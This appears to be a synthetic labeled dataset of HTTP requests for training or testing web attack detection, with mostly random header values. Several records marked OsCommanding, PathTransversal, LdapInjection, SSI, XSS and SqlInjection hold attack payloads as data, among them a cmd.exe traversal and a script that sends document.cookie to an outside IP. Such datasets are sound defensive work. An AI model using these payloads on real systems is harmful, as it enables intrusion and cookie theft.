UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 011x9947
Via: 0.2 20.190.78.52, 4.3 www.izca.js:17
Transfer-Encoding: fl0srr
Upgrade: zflt/3.2, paby/1.7, ges/5.4, den/9.0, ioa/1.3
Warning: 458 www.Ib4ru.tiff:9066 "sSe4nhsT" 
X-Forwarded-For: 229.9.95.131
X-Serial-Number: 72290
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13022
Start - Id: 4944
class: Valid
POST /WvecUXb/rcmsoc9Jtpitc/5window.openjFE/hrmRaNxyVKOFVUbP6Ev./t.PSuWPTcRHGLyGcy/isydo6/tsrWN/dbutXsu9.exe? HTTP/1.1
Content-Length: 282
Content-Language: siO7tvga,emr1sta,ih
Content-Encoding: gzip
Content-Location: http://www.3lcjg.be/9shGffhr/ndmerw/lu3OleI/pagnrrsr.jpeg
Content-MD5: bm5od2VkdG9lZW5udHl2cg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Oct 09 09:56:02 GMT
Last-Modified: Mon, 22 Jun 09 02:57:02 CET
Host: www.sxt6hnftre.be:8323
Connection: alloodb
Accept: */*
Accept-Charset: windows-1253;q=0.7, isiri-3342, utf-7, isiri-3342;q=0.4, koi8-r
Accept-Encoding: deflate, compress;q=0.9, identity, gzip;q=0.0
Accept-Language: t7ub-fmr;q=0.0, Y-eee;q=0.3, b6-klpoqN, E4o4tn-Tomtn;q=0.6
Cache-Control: no-cache
Client-ip: 103.157.186.193
Cookie: fgw8XFRexecp=\gsreplaceautoexecorconnectgaa-or=;4nsed=lhpw hhtpassn(ea(locationda6sopt;cea4=3111464
Cookie2: $Version="35"
Date: Thu, 10 Sep 09 10:41:08 UTC
ETag: "Mmj.38E6t4GeYzLQH_KA"
Expect: 100-continue
From: tsamc1M@it8Et.ch
If-Modified-Since: Mon, 12 May 08 20:15:27 CET
If-Unmodified-Since: Wed, 04 Jul 07 12:49:51 GMT
If-Match: "-TRSs0p7uwnJf_YaiWG"
If-None-Match: "qtW2J8EPpMr15hP"
If-Range: Mon, 25 Apr 05 13:04:06 GMT
Max-Forwards: 9
MIME-Version: 6.5
Pragma: c=i
Proxy-Authorization: NTLM bHRsem5hb2xkMHhhbmtldGdodmNhcG54OWlwZTExbnRzbzQ=
Authorization: Basic ZEFlY2JsOmtjdWlibnMz
Range: -9,-30994,21-971
Referer: /ieuanmE.asmx
TE: trailers,trailers
Trailer: Expect
User-Agent: 9smeaiwss
UA-CPU: Sparc
UA-Disp: 979,352,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4223x6180
Via: FTP/8.9 www.purlR.shtml:50, hluc9/1.6 www.iompcA.css
Transfer-Encoding: f5ts; afneopet=otbn
Upgrade: fFAahd/7.2, t4Oi/2.4
Warning: 222 www.oeeeay.gif:8841 "nriml4ld" "Mon, 28 Aug 06 16:14:52 GMT"
X-Forwarded-For: 18.33.117.239
X-Serial-Number: 2881856065
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fo=isIZL70&eecIneh6p=3727&tTg9ionl= t\j\&E6w=olti5q6ttui4X5aro&37nsnwne4=1867&QF_id=mh%Aejr&UVd_=erse&ymUWEZVwnFechocmd=lqlGs&yfMiXtt2tCu=sasmklaraa&eAJuSUqax=86532691&iem7bf4xOnoe=me a=lzIarsiY&unou=<Ul&eDa=na6&3pf=?|(thttp&wnae=spositiond6lri<dhopth script+e  

End - Id: 4944
Start - Id: 26422
class: Valid
GET /jT2gT8DzYWbDUu6f/cHNADyo/rietnTowltrnln/ea/eeyie5hm7afzDEgrlnaf/RlPT1WmVp4/s.7p-hSRmG/ftBOhjfSsJGJs.aspx?ehAorun=u&sasawaw7cpS=e7i HTTP/1.1
Host: www.aeun2iaz.uk
Connection: Ggt2as
Accept: video/mpeg, audio/x-wav, text/*;q=0.9
Accept-Charset: ks_c_5601-1987;q=0.4, us-ascii;q=0.9, x-mac-roman;q=0.9, iso-8859-9, windows-1250
Accept-Encoding: 
Accept-Language: lhhcr-duthN, aoaIh-iteeo;q=0.0, eL-5ediecAy;q=0.1, iesAt-mx4h, j-t2aolc5e;q=0.9
Cache-Control: no-store
Client-ip: 125.93.135.240
Cookie: oeoghthyrr=atSer;IqiframecW=t7CU1Gj
Cookie2: $Version="6"
Date: Fri, 19 Jan 07 01:12:00 GMT
ETag: "fK1XDGMWJ.QIP@.ZL.v"
Expect: 100-continue
From: 0vaorneD@ken7hhpNbe.st
If-Modified-Since: Sat, 05 Jul 08 08:41:05 CET
If-Unmodified-Since: Sat, 19 Nov 05 22:01:30 UTC
If-Match: "8gpVCWIuL33UeWk0c8Qn"
If-None-Match: "ep9dIftIi4hgU45QK1l"
If-Range: Sat, 01 Aug 09 23:45:20 GMT
Max-Forwards: 522
MIME-Version: 3.5
Pragma: oyndzti=t
Proxy-Authorization: Digest qop=ooToou0o
Authorization: il8e S9dws6t=h9to59of
Range: 976674-,-469,33-19
Referer: http://szalodi.com/scaZf7Pv.mdb
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/6.2 (Machintosh; U; Mac OS X 6.6; na-oh; rv:5.8.1) Gecko/66538010
UA-CPU: StrongARM
UA-Disp: 0058,1440,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1670x4966
Via: 5.6 www.1ibd5um.gif:47
Transfer-Encoding: nexHi; klk2c=iaae
Upgrade: lwmdc/2.7, Het/5.1
Warning: 710 www.ehhtaa.js "saamq" "Sun, 18 May 08 10:22:40 CET"
X-Forwarded-For: 59.157.184.124
X-Serial-Number: 3166594195
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26422
Start - Id: 43661
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.StTsribt.org:5
Connection: close
Accept: */*;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=326
Cookie: taaeartiel=tngovulcuqaDAqa;sgso4t=kpt r[deirjyd4rform;behzt1=tintb2
Date: Mon, 15 Oct 07 02:33:48 CET
If-Unmodified-Since: Thu, 17 May 07 19:47:46 CET
If-Match: "4RwpNY5ja7vm3k-"
If-None-Match: "aQv.P6W6o6GbeiSxKqn"
Referer: /pwga/heii/qeea/Ooepe/rTir.mdb
TE: chunked,gzip;q=0.9
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 5.1; im-lu; rv:6.0.6) Gecko/21792234
Transfer-Encoding: deflate

null

End - Id: 43661
Start - Id: 38779
class: LdapInjection
GET /rbvTmLz6GjK3uJywV/f@KDh-GC3O/XejPoORjC.tiff?q7diaLnr=3384&thriol=update+rat%3B%25u%5Cnf43include&esrssia2i0t=httpswrbexechxoi+igp%3C+awad5&g7rir3prsE=1580%29%28%26%28objectClass%3Drkiu%29%28%7C%28sn%3Dfgma%29%28cn%3Da1e+++++J*%29%29&wfh6teve=rsnslho9ln6ksseef HTTP/1.0
Host: 206.208.187.54
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: 7uNyr-i;q=0.3, uyvabI6-sj, n-merb, ol2-hr
Cache-Control: no-transform
Client-ip: 103.114.5.31
Cookie: 7-L0-a=nhw;631lRhA7d9M=Dhbmaaf;adywe=tx-AWyeRz@S;q5ldkdvo3bptl93=2412
Cookie2: $Version="919"
Date: Sat, 27 Aug 05 05:02:02 UTC
ETag: W/"veWm4Di8HikI9CrFgJ"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Sun, 17 Apr 05 14:46:26 GMT
If-Unmodified-Since: Fri, 26 Mar 04 24:55:50 GMT
If-Match: *
If-None-Match: *
If-Range: "WumTLqIPh_8WEXcrbd"
Max-Forwards: 06
MIME-Version: 3.1
Pragma: veRgcs='nR'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest cnonce="be4boie"
Range: 7-
Referer: /r0oafs/hgd7odea/wo2tEwa/eanp.swf
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/7.7 (Machintosh; U; PPC 3.0; d3-nb; rv:9.3.4) Gecko/78891777
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 601x604
Via: Day/0.5 191.130.216.182
Transfer-Encoding: compress
Upgrade: uheEfl/5.8, bsp/0.2, slh/3.9, tfor/3.1, iAr/7.5
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 251.245.132.75
X-Serial-Number: 323337935267147
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38779
Start - Id: 44918
class: PathTransversal
GET /rxP/6IjG3dR/otpyoreDewmnibieitsD/updateD32b9CSZ.tiff?deeoscsp=9366145&varFQFcfkK29=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500&htki6aeihb=rcpo6x&ss=mm7ntsoucrsi&1n=%26memaw&esrb0=9he&shlzdov7=a%29 HTTP/1.0
Host: www.lcsAedo.it
Connection: trgNw6
Accept: */*
Accept-Charset: x-mac-korean;q=0.0, x-mac-chinesesimp;q=0.5
Accept-Encoding: deflate
Accept-Language: wpd-eaa;q=0.8, ioooa-ctibyt, heEfk5bo-phtDqo73, l-un90, despd6se-la
Cache-Control: only-if-cached
Client-ip: 117.77.195.37
Cookie: HkncoTaynpt=Dphps;y7X3RxtermBm7QZ=5;iaceerNasovac=nodpsfnooe
Cookie2: $Version="12"
Date: Fri, 25 Aug 06 01:44:49 CET
ETag: W/"xgozFDJQuQqPl-86u-"
Expect: r1deaen
From: erlpd29@hbwsenumTc.de
If-Modified-Since: Fri, 15 May 09 17:54:38 UTC
If-Unmodified-Since: Thu, 03 Jun 04 13:05:45 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 30
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic ZUVpejZkbm06ZlhjM2ht
Authorization: Digest response="A8cC9A11411f31BeFefff6b7b4cc88bc"
Range: 50635-77
Referer: http://eesElN.cz/a7Da/pRnI/ldnP.doc
TE: trailers,trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/0.7 (compatible; Konqueror/5.2; WinNT; anae4eh)
UA-CPU: StrongARM
UA-Disp: 714,744,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6797x3315
Via: 9.6 16.59.221.72, oes/1.7 www.rax0smc.css, HTTP/9.1 170.218.222.238
Transfer-Encoding: deflate
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 640 197.125.93.67 "pyiaiihnet7qbt" "Wed, 01 Apr 09 17:31:52 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44918
Start - Id: 18867
class: Valid
GET /e5ZzZ8/ecrtja2nvsTWatv.tiff?ndyhayor=emd2eUHetd&Iihn=0361&h9oeiiteqsr=8548403237&smlAuai=ntSeFfoaeneOirljD&maKgmsAo=tcssySn8%3D&dhow96harTi4n=ieuftp&tj2A=+r%296esde&ekeeeuswpdise=zvn8n&4VxNV-Wa4I=182048293&god=VPtdpon&jcjwsIo9oeoio=7252492499&ptBqtlohveeoHoe=11&abobueera=ae4&hlueshlSUbaniow=aSH8xeo0et&vVNfromio3betweennKq3=tnThjpr HTTP/1.0
Host: www.qnhnCdabo.gov
Connection: keep-alive
Accept: audio/x-wav, video/quicktime
Accept-Charset: x-mac-roman, iso-8859-8-i, macintosh, windows-874
Accept-Encoding: compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 82.233.191.39
Cookie: YGGgzWyWD8V=274763
Cookie2: $Version="71"
Date: Thu, 22 Feb 07 23:50:24 UTC
ETag: W/"wdauU8CVIiZ2Id-Cu0"
Expect: 100-continue
From: mogs@imsit.st
If-Modified-Since: Sun, 06 Jan 08 12:09:20 GMT
If-Unmodified-Since: Mon, 02 Feb 09 02:51:37 GMT
If-Match: "vS2iWi2qPEZ.vB70f"
If-None-Match: "jzUYyKpHLYv5E4a"
If-Range: Mon, 09 Aug 04 06:16:06 GMT
Max-Forwards: 50
MIME-Version: 5.7
Pragma: qet=lsh
Proxy-Authorization: Digest nc=DEbC6f96
Authorization: Basic d3dobzplaWV0ZUo=
Range: 33-,46-263308
Referer: /o1gaL/orurtaty/o9eE.js
TE: trailers
Trailer: Host
User-Agent: faiu6dblngD0aLnRO
UA-CPU: PowerPC
UA-Disp: 708,1125,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 754x840
Via: FTP/1.4 www.aIrco.html:0054
Transfer-Encoding: gzip
Upgrade: sst/1.2, yoeg/0.2, eryeo/8.7, fnres/9.9
Warning: 951 www.irwnsd.tiff "9rmmauuilegoneDwol22" 
X-Forwarded-For: 56.146.49.3
X-Serial-Number: 65367829353425279089
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18867
Start - Id: 40821
class: SSI
GET /YE/slclEHFamgiinbect/rupito/nE3QlPHhjbrDfgjrkcQ/lqvaioEeot5ueoikg/u5SQoYZuzAd/indceaarse8c/hlrs1oeeUEqkwderah/wgcc6own/hFlkxuOhhbphV/ht.jpg?eKti6ojtd=d&rnpaTteeIbM=tyaO1idnlocationunntuE&z2jupdateYoinputLx=it%26%2B%28&yi=o%3AAic&oNa4dW9tre=jcdico8rsevo4fwa&1q=enleaiFoh-sEittuhi+&Ars9hewaoisof=7&isehrOr3l7to=9732221311&eaft8taeaito0=execeae1wNg3tzAsw&Ih8ot5eai4ohrt=%3C%21--+++%23odbc++statement++%3D%22select+yo%2C+++rhm%2C+++ceht++from+tsTMO+++order+++by++++3%2C++++31%2C++0%22+++--%3E&dengaeri=218&m0Xhhaving=7490171&Ossiaeez=rTSo&xeju=7 HTTP/1.1
Host: 112.148.201.241
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip, identity
Accept-Language: ectOe-itArt;q=0.4
Cache-Control: no-transform
Client-ip: 202.227.248.144
Cookie: gWdtNteOmmsne4U=if2onoan;ihgeedrwoau=$8union$kt];gjs
Cookie2: $Version="76"
Date: Sun, 19 Jul 09 12:20:53 CET
ETag: "ze8tP8YuldNjp2a4As6o"
Expect: lwro1wg
From: kpa1hln@eotgi.biz
If-Modified-Since: Tue, 10 Feb 04 18:25:50 CET
If-Unmodified-Since: Sat, 12 Mar 05 02:41:44 CET
If-Match: "TrZaYg5._f@ouFd1lMcE"
If-None-Match: "bFwIfFTc_tTg-Gte-pq"
If-Range: Sat, 10 Mar 07 12:00:02 GMT
Max-Forwards: 756
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: on4ahi jgjs0nph=any1zdr
Authorization: if5env ebtl=ueeojqn
Range: 90-,846222-
Referer: http://www.ieIS0tbt.st/bgcy8aur/sosfCjy/x90jRry.asp
TE: trailers,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: ri3stsbUr/1.1.3.3.5
UA-CPU: x86
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 047x242
Via: 0.6 www.earw.tiff, 4.0 74.72.93.92
Transfer-Encoding: ltren; ineyrt=ltfgth
Upgrade: hete/2.5
Warning: 540 www.po8V.png "hmamwrzrbsooT4ssuu1y" "Sun, 05 Dec 04 12:09:33 CET"
X-Serial-Number: 623411
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40821
Start - Id: 3023
class: Valid
GET /Lbre/sogj2sHpkqlfnb5innp.cgi?rossjasa=er&lso=PB5idivmiieHadnor&T4=esgL HTTP/1.0
Host: www.sIss.uk
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip, compress, gzip, compress;q=0.8, compress
Accept-Language: eehd-nOeebeS, s-Orl, a-lwetb;q=0.9
Cache-Control: max-stale
Client-ip: 109.15.123.3
Cookie: lIm4N8esx=35;8o=33967600;mtNoo3o0nC=4rs7ihuPttc;p8esnsZq=twlwi6ba1weoet;4qgaae=3enqidoPH912dlso
Cookie2: $Version="951"
Date: Sun, 27 Jun 04 11:18:09 GMT
ETag: "qUHkNbL-yPO3IxUA"
Expect: 100-continue
From: Gnrp@qqtreOp.fr
If-Modified-Since: Mon, 24 Jul 06 10:43:20 GMT
If-Unmodified-Since: Sat, 08 Apr 06 17:15:49 GMT
If-Match: *
If-None-Match: "oWxgWO0NqyMr414_2eW"
If-Range: Tue, 18 Mar 08 04:39:20 GMT
Max-Forwards: 7
MIME-Version: 1.8
Pragma: o=rNAep
Proxy-Authorization: iaasI fdsn=2omiDleT
Authorization: oceiT llft=Woogge0
Range: 37991-,-13
Referer: /sueos22/etavn9cr/Msgiotge/re6r.jsp
TE: chunked,trailers,gzip
Trailer: Warning
User-Agent: rfoso6i8b (i@cdA_Y0ZU)
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 737x8655
Via: 8.1 www.mmes8S.jpeg, 0.2 www.dt9y1o.htm
Transfer-Encoding: compress
Upgrade: nenfhq/1.5, aiea/9.0, 8nTSn/3.7, sddt9/6.1
Warning: 788 169.251.130.184 "eeko" 
X-Forwarded-For: 34.221.232.228
X-Serial-Number: 32933233721
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3023
Start - Id: 45651
class: PathTransversal
GET /bG/nrlsiann8Hn/nO-oHGhoL/nc0AdxR21ijG3Hv/srretAefnh1l/oxct/GFc@_6nfromchildpassthru29Gpasswd/a48v0qNQIvGhNcT5Ij1/4rew0hdyhso.mspx?QK3zn9zmCTOZ=t%3A%5Cwindows%5Cboot.ini HTTP/1.1
Host: www.fwistt.com
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, gzip;q=0.1, gzip, gzip;q=0.9, compress
Accept-Language: *
Cache-Control: min-fresh=20
Client-ip: 49.59.138.232
Cookie: ex=ozthr%ke3 
Cookie2: $Version="427"
Date: Tue, 19 Sep 06 07:09:00 GMT
ETag: "@9jfyx5Jsp9gY1D-"
Expect: 100-continue
From: f6eo@ixbm.net
If-Modified-Since: Wed, 03 Mar 04 19:06:46 GMT
If-Unmodified-Since: Wed, 10 Mar 10 22:57:48 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 08
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: 6451-1616,73067-
Referer: /meyf/intr/sA86/twst7e.html
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/6.6 (Windows; U; Win 9x 3.4; mn-By; rv:8.7.8) Gecko/40296445
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 822x7787
Via: HTTP/9.2 www.taayee.shtml
Transfer-Encoding: npem; 4tirq1=vykbdsk
Upgrade: 8mc5/8.9
Warning: 702 www.ikMktgs.gif "4eeenmnrnbeDidot" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 4318148965798
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45651
Start - Id: 18994
class: Valid
GET /ZVEAr4sn5mt/aanrimis2sWIann/disaiiatlLcslty/i.c1K3n_aJ7wNR/HBs/43ueyrnmtmtst/18rhc.pl?gpehilbhtsicxt=sgfnullvescriptEOnchild HTTP/1.0
Host: 39.137.146.175:80
Connection: nyagtma
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: npo-osEanl9a;q=0.4
Cache-Control: max-age=17
Client-ip: 103.87.128.39
Cookie: nsptr=e;1UIobjectpJx8ZOy=nuoeaa6;dtirchgz=hdcQbjtdIt;0m7a=enYjed6LCe/eE;ottEa0smNRrLao5=s4Dmctmp;PZsdapngetrTi0=ledkE.B
Cookie2: $Version="10"
Date: Wed, 25 Jun 08 04:49:35 GMT
ETag: "v.fs8aP2gl-.Poow7ee2"
Expect: yOur=ilsenet
From: l14gyjst@isddra.be
If-Modified-Since: Sat, 03 Apr 04 16:00:14 GMT
If-Unmodified-Since: Tue, 25 Nov 08 15:07:35 CET
If-Match: "Ld9u.KUisbrazHX5fF"
If-None-Match: "RBPAjsDT3Z_J7Z.YX"
If-Range: Sat, 21 Mar 09 10:16:49 UTC
Max-Forwards: 6
MIME-Version: 9.9
Pragma: na=hor
Proxy-Authorization: Digest username="elrscge"
Authorization: NTLM bWN3b2VsZGl3aWV1bmVlY05uaXViRWZkZXNhc2hwYWEycHNkZUFMZXU=
Range: 2800-0168
Referer: http://www.ne7s.org/roere/Nttyorl/iwTl.mpeg
TE: trailers,deflate,gzip;q=0.2
Trailer: Connection
User-Agent: Mozilla/2.8 (X11; U; Unix 9.9; nu-do; rv:9.4.6) Gecko/16801214
UA-CPU: 68000
UA-Disp: 655,4589,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 249x219
Via: 1.9 www.aaltp.jpg
Transfer-Encoding: ulxe; ncrci2aa=bO5wd
Upgrade: hs7tmg/2.5
Warning: 384 www.ihOsnx.gif:86157 "3mwtkhlueagtttZwo" 
X-Forwarded-For: 227.198.34.58
X-Serial-Number: 27260320301
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18994
Start - Id: 48280
class: XSS
PUT /2jPnQ1CMmHdQMgc4/a5iiasyIdialhduuiwm/s8ymra4deedopa/WbuYstyle3T3/rwaetoniaoox9odt5ga/a9escod/i67ECGFlT2N@Yyk@srf/e@NtryyN15fjQCd/E@gNfPFZu_xp_xWKr/xtx3qbG6j7F-APIUiH/M_WWI_5logpwherea.tiff? HTTP/1.1
Content-Length: 63
Content-Language: i8a,irePdaag,n7rv
Content-Encoding: deflate
Content-Location: /rod3ot/lotQ/aseN1sEa/sttt/nneadp.gif
Content-MD5: enRoNWZzUm5oejFJZXBycg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 28 Mar 10 04:29:57 UTC
Host: 202.235.62.204
Connection: toEdc2el
Accept: */*;q=0.5
Accept-Charset: koi8, iso-8859-15;q=0.4, windows-1255
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 222.114.110.203
Cookie: obh=xa@kZ01g;Tgjstbgsoundgv=253417;9ho0u6n3twNn=<a    href    = " javas&#99;ript&#35;[window.open('http://126.67.200.58/taro.dll'+document.cookie);]">;5tmtteeheob=4ajt;lht9epemn8e=t6D2lj9fe;uaOEhayhybtrohd=wcaaW
Date: Fri, 01 Jun 07 14:13:03 UTC
ETag: "8mEWmcdF58sJeRO0qGXz"
Expect: nDfpli=ume4;ptbne=1tTfrZwe
From: oe7l@mhO7ens.net
If-Modified-Since: Mon, 10 Mar 08 17:31:20 GMT
If-Unmodified-Since: Sat, 07 Feb 04 24:19:21 GMT
If-Match: *
If-Range: "hpu03hEBwZ24d0kWK-"
Max-Forwards: 994
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="bs8AH8ee"
Authorization: Digest cnonce="nN2iAr"
Range: -608,1355-6,3703-
Referer: http://www.24nrnie.fr/erxt4o/yqsr/o6tiqtga/Ktpin/dufyewO.mpeg
TE: deflate;q=0.8,trailers
Trailer: TE
User-Agent: Mozilla/3.4 (X11; U; Linux i386 4.9; jw-u1; rv:4.6.7) Gecko/17146681
UA-Disp: 556,976,16
UA-OS: Win98
UA-Pixels: 085x133
Via: FTP/6.2 144.134.111.67, 1.6 www.jrty.png, 0.5 182.101.209.161
Transfer-Encoding: deflate
Upgrade: tpEnch/1.6, w4a/6.0, e4p/1.8, to3y/9.1
Warning: 946 www.inoh.jpg "l4aerdips3tmta6SiRi" 

donezhrrn=53482640&@G6oWr=007883804&ioead6soi7eh=3ebgsoundhttps

End - Id: 48280
Start - Id: 42424
class: SqlInjection
GET /aU2F@pT2/Eeoiqusa/zsadhnmwloeconqet/kuglihinleaot5qljnT/zsH/rtehmdhDahiep/b2cur/rsqW6T8XR7ef6LW/J1n0/RL@CPpc.p.allv@b.pl?Steeewrh=3958&ansoxuy=4&ewsxt4sgioeweu6=ted5m&ZidTb1documentc=OR+105869836%3D105869836&lEfo=+rwZe&servicestgcD2Cprocessing-instructionUDHT=aexectapr&inputhciKJI3dO=He+o%40+Ir%29o&isr=i4se&nef=%27a&mnhnn=n6prxq&thurtlfomaovNt=022493&ufseoael=f+el9fRefe7ulhtpass&diqatl=u&shynTate=m&2oncdo@yT9uR=61904924 HTTP/1.0
Host: www.sRhtne.ch
Connection: close
Accept: image/jpeg;q=0.2, video/quicktime, audio/*
Accept-Charset: windows-874, iso-8859-15, windows-1250;q=0.0, hz-gb-2312, x-mac-korean;q=0.0
Accept-Encoding: deflate;q=0.4, compress;q=0.2, identity;q=0.0, identity
Accept-Language: ayhvDnn-inza, 1gce3nc-q;q=0.5, atMis1Nh-EHedau3;q=0.0
Cache-Control: oeen='AflmweD'
Client-ip: 28.141.41.185
Cookie: hl=d2wteffl;9XP@M2J@cconnectW=oiyab;areh=Eenwn2zwsnrtwhsni
Cookie2: $Version="157"
Date: Sun, 03 May 09 05:32:32 UTC
ETag: W/"ROs81ENXsNKrraDFF"
Expect: epanbff
From: Tm9x@je4xi.it
If-Modified-Since: Thu, 09 Feb 06 09:00:15 CET
If-Unmodified-Since: Tue, 30 Mar 04 08:10:04 GMT
If-Match: "DyIdS6qC79jRQ49jY"
If-None-Match: "pNN1.vyaxQzf9kZ"
If-Range: Tue, 22 Feb 05 21:12:15 UTC
Max-Forwards: 15
MIME-Version: 0.1
Pragma: ttExI=sunRi
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: Digest nonce
Range: 005696-6624,4-
Referer: /leont/xpfar.mdb
TE: gzip;q=0.6,trailers
Trailer: Trailer
User-Agent: ynm9sntrl/1.1.0.8.1
UA-CPU: 68000
UA-Disp: 4009,500,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 189x646
Via: HTTP/6.0 www.reH4ok.png
Transfer-Encoding: compress
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 781 102.8.11.215 "Yhee38R7lileIanstkb" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42424
Start - Id: 18198
class: Valid
GET /fLDqKsUjhqbJE-2SmZmk/o2uICj/tFa/bOdlaa/neoe3Egms9/8cKWq6RAo1/zRtt9steoxo/ejeetbaioTsdqchx2/fs.ZRv5.e4Cc/hogEi7lbhhtrlpy.css?ontseniCo=8991&iihhl=3433609254&sa=pqte&aRedwo=p9Z%40&fcmdpconsa=108&5SqwinntExnTo8=48118937&mue=158240055 HTTP/1.0
Host: www.oirj5s59sl.fr
Connection: keep-alive
Accept: image/gif, audio/x-wav;q=0.5
Accept-Charset: iso-2022-kr, iso-8859-15, windows-1254
Accept-Encoding: 
Accept-Language: sed-hHtli, bham-ahn2Hr
Cache-Control: max-age=6803
Client-ip: 16.200.79.239
Cookie: 1e6m=wunlwd;othP8toeci8l=audEp8;oaXen8vd=gg1uLg;eun=6155605;P1H74m05body=aZj3v;m6QshutdownOvanLU=N
Cookie2: $Version="78"
Date: Sun, 01 Jan 06 06:21:18 GMT
ETag: "H5DDMyszPXPK44q@3"
Expect: aaonKjt5=Elnth;oIrtoa0c=y3umpou0
From: T581@xdel.gov
If-Modified-Since: Mon, 10 Apr 06 21:49:08 GMT
If-Unmodified-Since: Tue, 31 Oct 06 05:06:26 UTC
If-Match: *
If-None-Match: *
If-Range: "H6YR6xS3TGsYG1NWz1"
Max-Forwards: 2
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic Zkllc3dPOm5BamV1cg==
Authorization: fztohd c3tcp=i5whPe
Range: 666465-916
Referer: http://www.limse.be/egtiemhl/lo7ar/elnb/botLei8g.dll
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.4 (Windows; U; Windows NT 5.9; uR-ur; rv:8.6.7) Gecko/70495322
UA-CPU: StrongARM
UA-Disp: 904,033,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 255x381
Via: 0.6 201.195.193.44, 5.7 www.6ae6Pi6.jpg
Transfer-Encoding: deflate
Upgrade: hicew/7.4, 1ok/5.7, 4ba/6.1, Inm/8.9, hutr/5.7
Warning: 457 249.243.123.227 "ar3gutfzh" "Thu, 05 Jul 07 12:26:34 GMT"
X-Forwarded-For: 138.19.25.37
X-Serial-Number: 93769188235463446017
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18198
Start - Id: 32023
class: Valid
GET /MyeI5/8FfCJL6/yKl/t_NcOhFLsr/i7dh4urhti8nsa/esX4X1IrW8/nmozrUTGMvU90je/aKH4n/rd8e3wrin/scriptpfBp.tiff? HTTP/1.1
Host: 73.57.197.26
Connection: hiwRan
Accept: audio/x-wav, video/mpeg;q=0.3, image/*
Accept-Charset: iso-8859-7;q=0.7, x-mac-greek, iso-8859-3;q=0.7, iso-8859-7;q=0.3
